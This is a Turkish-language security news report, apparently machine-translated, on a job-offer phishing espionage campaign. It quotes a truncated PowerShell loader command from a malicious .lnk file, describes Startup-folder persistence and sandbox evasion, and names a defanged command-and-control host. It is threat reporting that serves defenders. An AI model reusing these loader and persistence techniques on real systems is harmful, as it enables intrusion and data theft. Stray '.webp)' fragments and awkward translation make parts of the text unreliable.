Tehdit aktörlerinin işe alım görevlilerini ve belirli kuruluşların çalışanlarını hedeflemek için işe alım görevlileri olarak maskelenen sofistike bir siber casusluk kampanyası ortaya çıkarıldı.
Saldırganlar, meşru endüstriyel kuruluşlardan iş fırsatları olarak gizlenmiş kimlik avı e -postaları göndererek, istihdam teklifleri gibi görünen ancak aslında hassas bilgileri çalmak için kötü amaçlı yazılımlar dağıtır.
.webp)
Kampanya, iş istihdamına odaklanan sosyal mühendislik taktiklerini kullanıyor, çünkü iş arayanlar potansiyel istihdam fırsatlarıyla ilgili ekler açma olasılığı daha yüksek.
E-postalar, kötü niyetli kodu gizleyen meşru iş tanımlarına sahip şifre korumalı zip dosyaları içerir.
Bi.zone Güvenlik Araştırmacıları, bu kampanyayı Aralık 2024’te tanımladılar ve onu Squid Westwolf (APT37 veya Reaper Grubu olarak da izlenen) olarak bilinen bir tehdit aktörüne bağladılar.
Analizleri, saldırının, kurban sistemlerine kalıcı erişim sağlarken tespitten kaçınmak için dikkatle tasarlandığını ortaya koydu.
İlk enfeksiyon, kurbanlar bir PDF iş tanımı gibi görünen şeyi açtığında ortaya çıkar, ancak aslında bir çift uzantılı bir kısayol dosyasıdır (.lnk).
Bu dosya, ekin kendisi içinde gizlenmiş birden çok bileşeni çıkaran ve dağıtan sofistike bir PowerShell komutu yürütür.
Yürütüldükten sonra, kötü amaçlı yazılım, meşru Windows yardımcı programı dfsvc.exe’yi başlangıç klasörüne kopyalar ve sistem önyüklendiğinde otomatik olarak çalışmasını sağlar. Daha sonra, bir yapılandırma dosyası ve kötü amaçlı bir DLL de dahil olmak üzere saldırı için gerekli destekleyici dosyaları oluşturur.
Saldırı Mekaniği
LNK dosyası tarafından yürütülen PowerShell komutu, bu saldırının sofistike doğasını ortaya koyuyor:
powershell.exe -nop -c $t=$env:appdata+'\Microsoft\Windows\Start Menu\Programs\Startup';if(Get-ChildItem $env:temp -recurse 'Предложение о работе.pdf.lnk'){$k=New-Object IO.FileStream ($env:temp+'\'+((Get-ChildItem $env:temp -recurse 'Предложение о работе.pdf.lnk').Directory).Name+'\'+'Предложение O работе.pdf.lnk'),'Open','Read','ReadWrite'}.webp)
Kötü amaçlı yazılım, zamana dayalı sanal alan algılama ve internet bağlantı kontrolleri dahil olmak üzere birden fazla kaçırma tekniği kullanır.
HWSRV-1253398.hostwindsdns adresindeki bir komut ve kontrol sunucusuyla iletişime geçer.[.]com AES128 CBC şifrelemesi kullanılarak daha sonra şifre çözülen ek şifreli yükler indirmek için.
Bu tür tehditlere karşı korumak için güvenlik uzmanları, e -posta güvenlik çözümlerinin uygulanmasını, bilinmeyen gönderenlerden ekleri açmaktan kaçınmayı ve başlangıç konumlarındaki şüpheli PowerShell komutlarını ve faaliyetlerini belirleyebilen uç nokta algılama ve yanıt araçlarının dağıtılmasını önerir.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.